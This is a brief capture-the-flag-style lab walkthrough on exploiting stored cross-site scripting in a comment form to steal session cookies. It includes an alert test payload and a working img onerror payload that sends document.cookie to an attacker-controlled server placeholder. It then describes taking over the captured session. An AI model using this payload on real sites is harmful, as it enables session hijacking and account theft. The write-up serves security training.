22) Exploiting cross-site scripting to steal cookies

Locate possible injection points

As usual the first step is to analyse the application, we have comment form so we fill it with random string like xxxx then open the developer tools and find where the user input is located in the html

let's try to inject a simple img payload in the comment field and try to trigger an alert

payload => <img src=x onerror=alert(1)>

now let's open burp suite collaborator

<img src=x onerror=this.src="http://<YOUR_SERVER_IP>/?c="+document.cookie>

This payoad will make anyone who views the comment issue a Get request containing their cookie to your subdomain in the urlSearchParam c on the public Collaborator server.

if the collaborator didn't poll automatically make sure to click on Poll now

so this is the session

zO3ZD5fvkLh3kA55da9fHJXdGMqXePrg

make sure to edit the session with the stolen one and save the edit, i used the Cookie Editor Extension you can use the devtools if you prefer

now refresh the page with the hijacked session, and the lab is solved